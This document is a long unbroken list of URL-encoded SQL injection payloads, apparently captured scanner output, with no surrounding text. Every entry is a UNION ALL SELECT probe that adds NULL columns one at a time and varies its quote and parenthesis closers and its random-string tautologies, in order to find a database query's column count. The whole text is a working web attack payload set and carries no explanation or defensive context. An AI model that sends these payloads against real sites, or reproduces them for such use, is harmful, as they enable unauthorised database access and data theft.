1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27aNzc%27%20LIKE%20%27aNzc 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27QUCf%27%20LIKE%20%27QUCf 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27qmPB%27%20LIKE%20%27qmPB 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27ysor%27%20LIKE%20%27ysor 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27lXFj%27%20LIKE%20%27lXFj 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27cHuM%27%20LIKE%20%27cHuM 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27clht%27%20LIKE%20%27clht 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27QIfD%27%20LIKE%20%27QIfD 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27YAnT%27%20LIKE%20%27YAnT 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27FXjI%27%20LIKE%20%27FXjI 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27uoNF%27%20LIKE%20%27uoNF 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27etHN%27%20LIKE%20%27etHN 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27BMVD%27%20LIKE%20%27BMVD 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27msVY%27%20LIKE%20%27msVY 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27PVeY%27%20LIKE%20%27PVeY 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27gNBx%27%20LIKE%20%27gNBx 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27zrXN%27%20LIKE%20%27zrXN 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27cfwE%27%20LIKE%20%27cfwE 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27gGdI%27%20LIKE%20%27gGdI 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27MCsz%27%20LIKE%20%27MCsz 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27GUGK%27%20LIKE%20%27GUGK 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27itUK%27%20LIKE%20%27itUK 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27kgOm%27%20LIKE%20%27kgOm 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27xdGB%27%20LIKE%20%27xdGB 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27exAf%27%20LIKE%20%27exAf 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27hOVs%27%20LIKE%20%27hOVs 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27lSoa%27%20LIKE%20%27lSoa 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27jcig%27%20LIKE%20%27jcig 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27DaSw%27%20LIKE%20%27DaSw 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27avsE%27%20LIKE%20%27avsE 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27hUXi%27%20LIKE%20%27hUXi 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27QhCW%27%20LIKE%20%27QhCW 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27HlWM%27%20LIKE%20%27HlWM 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27BIxi%27%20LIKE%20%27BIxi 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22kyCK%22%3D%22kyCK 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22WeNo%22%3D%22WeNo 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22ZwJK%22%3D%22ZwJK 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22NdGp%22%3D%22NdGp 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22DBQM%22%3D%22DBQM 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22cAKz%22%3D%22cAKz 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22nJAA%22%3D%22nJAA 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22tXLt%22%3D%22tXLt 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22pPYk%22%3D%22pPYk 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22tsrS%22%3D%22tsrS 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22IcLB%22%3D%22IcLB 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22sqzr%22%3D%22sqzr 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22yXFB%22%3D%22yXFB 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22xUFO%22%3D%22xUFO 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22QAAs%22%3D%22QAAs 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22YVtB%22%3D%22YVtB 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22uqUb%22%3D%22uqUb 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22fpzg%22%3D%22fpzg 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22PEtD%22%3D%22PEtD 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22gMTX%22%3D%22gMTX 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22QWct%22%3D%22QWct 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22HXIk%22%3D%22HXIk 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22YjTI%22%3D%22YjTI 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22eRCh%22%3D%22eRCh 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22jjAW%22%3D%22jjAW 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22kwTd%22%3D%22kwTd 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22Yvgn%22%3D%22Yvgn 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22uduG%22%3D%22uduG 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22owuK%22%3D%22owuK 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22xunp%22%3D%22xunp 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22IIYx%22%3D%22IIYx 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22cVRt%22%3D%22cVRt 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22KhgD%22%3D%22KhgD 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22BWIi%22%3D%22BWIi 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22XzjZ%22%3D%22XzjZ 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22QUCk%22%3D%22QUCk 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22kKHY%22%3D%22kKHY 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22fqEn%22%3D%22fqEn 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22CPlV%22%3D%22CPlV 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22xlna%22%3D%22xlna 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22dyVF%22%20LIKE%20%22dyVF 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22ZUGp%22%20LIKE%20%22ZUGp 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22aWth%22%20LIKE%20%22aWth 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22MAtz%22%20LIKE%20%22MAtz 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22KXYL%22%20LIKE%20%22KXYL 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22zHxK%22%20LIKE%20%22zHxK 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22lpEY%22%20LIKE%20%22lpEY 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22APdd%22%20LIKE%20%22APdd 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22VNrg%22%20LIKE%20%22VNrg 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22vZSd%22%20LIKE%20%22vZSd 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22hAWY%22%20LIKE%20%22hAWY 